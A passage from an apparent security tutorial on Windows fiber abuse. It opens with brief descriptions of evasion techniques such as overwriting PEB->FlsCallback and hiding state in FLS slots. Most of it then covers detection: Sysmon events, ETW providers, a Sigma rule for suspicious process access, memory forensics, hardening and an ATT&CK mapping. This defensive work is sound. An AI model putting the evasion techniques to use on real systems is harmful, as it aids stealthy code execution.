PEB->FlsCallback overwriteOverwrite an entry in the process-wide FLS callback array; on the next FlsFree or fiber/thread teardown the attacker-controlled pointer is invoked with attacker-controlled data
TLS evasion via FLSHide per-task state in FLS slots that defensive tooling enumerating TLS will miss
API hiding via intrinsicsGetCurrentFiber/GetFiberData produce no IAT entry; static analysis missing gs:[0x20] reads will not see fiber-aware code

The base ATT&CK parent for fiber-based in-process execution is T1055 Process Injection; MITRE has not assigned a fiber-specific sub-technique, so the closest analogue is T1055.004 (APC) which shares the “queue execution to a thread’s user-mode context” model.


11. Defensive Strategies & Detection

There is no kernel event for SwitchToFiber. Detection must focus on the setup that precedes fiber-based execution (RWX allocation, suspicious entry points) and on memory forensics of fiber state at rest.

Sysmon coverage for the surrounding behavior:

Event IDSignal
1Process Create — establish baseline lineage
8CreateRemoteThread — co-occurs with cross-process fiber staging
10ProcessAccess — reflective loaders reading remote memory before fiber dispatch
17/18Named-pipe create/connect — common multi-stage loader IPC
25ProcessTampering — image-region tampering in a fiber host

ETW providers worth subscribing:

  • Microsoft-Windows-Threat-Intelligence — flags VirtualAlloc/VirtualProtect with PAGE_EXECUTE_*, the precursor to fiber shellcode staging.
  • Microsoft-Windows-Kernel-Process — does not see fiber switches but covers process/thread lifecycle.
  • A user-mode consumer hooking NtAllocateVirtualMemory + NtProtectVirtualMemory gives the strongest pre-execution signal.

Memory forensics indicators:

  • Walk TEB.NtTib.FiberData on every thread. Threads with HasFiberData == 1 in processes that have no business using fibers are immediately interesting.
  • Use Volatility malfind to surface private, executable, non-image-backed pages — the target of a fiber-staged payload.
  • Dump PEB->FlsCallback and verify every entry resolves to an expected module’s .text section.

Sigma sketch for the cross-process precursor to fiber-based payload staging:

title: Suspicious ProcessAccess Preceding User-Mode Fiber Execution
id: 8f5c1d6e-3c7b-4b1f-9e1e-7e3e6e2b0a1f
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x1fffff'   # PROCESS_ALL_ACCESS
      - '0x1f0fff'
    TargetImage|endswith:
      - '\explorer.exe'
      - '\svchost.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\SenseIR.exe'
  condition: selection and not filter_legit
level: high
tags:
  - attack.t1055
  - attack.t1106

Hardening:

  • SetProcessMitigationPolicy with ProcessDynamicCodePolicy (Arbitrary Code Guard) blocks creation of new executable pages, defeating fiber shellcode staging.
  • Control Flow Guard restricts indirect-call targets, narrowing SwitchToFiber and FLS-callback abuse to valid entry points.
  • HVCI / memory integrity prevents kernel-side tampering of FIBER structures via vulnerable drivers.
  • WDAC / AppLocker policies that deny PAGE_EXECUTE_* allocations on non-JIT processes raise the cost of any in-process execution primitive.

Graph diagram mapping fiber abuse detection signals: RWX allocation feeding ETW Threat-Intelligence provider and Sysmon events, memory forensics walking PEB FlsCallback for non-text-section pointers, and ACG/CFG/HVCI as hardening mitigations
Because SwitchToFiber produces no kernel telemetry, defenders must pivot to pre-execution signals like RWX allocations, memory forensics on FiberData and FlsCallback, and ACG to deny executable page creation entirely.

12. Tools for Fiber Analysis

ToolDescriptionLink
WinDbgDump TEB, walk NtTib.FiberData, inspect FIBER.FiberContextmicrosoft.com
Process HackerEnumerate threads, inspect TEB, examine private RWX regionsprocesshacker.sf.io
Process MonitorCapture VirtualAlloc/VirtualProtect sequences preceding fiber dispatchsysinternals.com
Volatility 3windows.malfind, TEB plugins, FLS callback inspectionvolatilityfoundation.org
pykd / WinDbg JSScripted walks of FIBER chains across all threadsgithomelab.ru/pykd
x64dbgUser-mode debugging of fiber-aware binaries; trace gs:[0x20] readsx64dbg.com
GhidraStatic analysis; recognize GetCurrentFiber intrinsic patternghidra-sre.org
SysmonSurrounding telemetry (Events 1, 8, 10, 25)sysinternals.com

A minimal WinDbg recipe to surface fiber-hosting threads in a captured process:

0:000> !teb
TEB at 000000abcd123000
    ...
    NtTib.FiberData:  0000020fabcde000
    ...
0:000> dt ntdll!_TEB @$teb HasFiberData
0:000> dq 0000020fabcde000 L40   ; raw FIBER bytes — layout version-dependent

13. MITRE ATT&CK Mapping

TechniqueMITRE IDDetection
Process InjectionT1055Memory scan for private RWX regions; ETW TI on NtAllocateVirtualMemory
Process Injection: Asynchronous Procedure CallT1055.004Closest published sub-technique to fiber-based in-process execution
Native APIT1106API-call auditing of CreateFiber/SwitchToFiber/FlsAlloc
Reflective Code LoadingT1620Image-load anomalies; fiber entry point in non-image-backed memory
Impair Defenses: Disable or Modify ToolsT1562.001ETW/AMSI hook integrity checks; user-mode hook auditing

MITRE ATT&CK does not currently list a “Fiber Injection” sub-technique (current as of v16.1). Vendor research treats fiber-based execution as a variant of T1055; map accordingly.


Summary

  • A fiber is a user-mode cooperative thread invisible to the kernel scheduler — SwitchToFiber performs a stack and register swap entirely in KernelBase.dll with no syscall.
  • The TEB exposes the fiber state via NtTib.FiberData, HasFiberData, and FlsData; the FIBER structure itself is undocumented and version-dependent.
  • TLS is per-thread and is not swapped on a fiber switch; FLS is per-fiber and is swapped, with destructor callbacks tracked in PEB->FlsCallback.
  • Adversaries abuse fibers for in-process shellcode execution, ROP staging via the saved CONTEXT, and code execution via PEB->FlsCallback overwrites — none of which trigger thread-creation telemetry.
  • Detect via pre-execution signals (ETW TI on RWX allocations, Sysmon Event IDs 8/10/25), memory forensics on private executable regions and FlsCallback integrity, and hardening with ACG, CFG, and HVCI.

Related Tutorials

References